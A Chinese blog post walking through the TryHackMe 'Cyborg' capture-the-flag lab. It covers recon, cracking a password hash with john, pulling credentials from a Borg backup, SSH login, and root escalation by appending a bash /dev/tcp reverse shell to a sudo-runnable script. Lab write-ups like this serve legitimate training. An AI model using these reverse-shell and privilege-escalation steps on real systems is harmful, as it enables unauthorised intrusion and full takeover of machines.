iT邦幫忙

2021 iThome 鐵人賽

DAY 12
0
  • 網址:https://tryhackme.com/room/cyborgt8
  • IP : 10.10.210.57

資料蒐集

  • 老梗 nmap -A 10.10.210.5
  • 回答問題
    • Scan the machine, how many ports are open
      • 2
    • What service is running on port 22?
      • SSH
    • What service is running on port 80?
      • HTTP
  • 掃路徑
    • python3 dirsearch.py -u http://10.10.210.57/ -e all
      • /admin/
      • /etc/

Web

  • 先從 /etc/ 路徑開始看裡面有啥
  • 找到路徑底下有一個 passwd 檔案
  • 透過 john 進行爆破
    • john a.txt --wordlist=/opt/rockyou
    • 取得帳密
      • 帳號 : music_archive
      • 密碼 : squidward
  • 繼續逛 /admin/
    • 發現有 Archive 可以下載
  • 解開之後發現是一種奇怪格式

Brog

  • 嘗試簡單的看完說明後
    • borg list .
      • 輸入密碼,剛剛約翰破出來的 squidward
      • 可以看到一些資訊
    • borg mount . ../a
      • 把檔案掛載起來
  • 發現掛載的檔案裡面有 note
    • alex:S3cretP@s3
    • 看起來就很像帳密

SSH

  • 用 ssh 搭配帳密登入
    • 取得 user flag

提權

  • 先用 sudo -l 看我們有什麼權限
    • 發現我們可以用 sudo 執行 /etc/mp3backups/backup.sh
  • 觀察權限
    • 發現我們是這個檔案的擁有者,但我們不能修改他
    • 不過可以透過 chmod +w 新增 Write 權限
  • 插入 Reverse shell
    • echo "bash -c 'bash -i >& /dev/tcp/10.13.21.55/7877 0>&1'" >> /etc/mp3backups/backup.sh
    • 直接用 reverse shell 插入檔案最下方
  • 執行 shell
    • 攻擊機開啟監聽
      • nc -vlk 7877
    • 被駭機用 sudo 執行該檔案
      • sudo /etc/mp3backups/backup.sh
  • 拿到 root shell!

上一篇
[Day11] THM Bounty Hacker
下一篇
[Day13] THM Res
系列文
我想學滲透測試喵喵喵喵!!!!30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言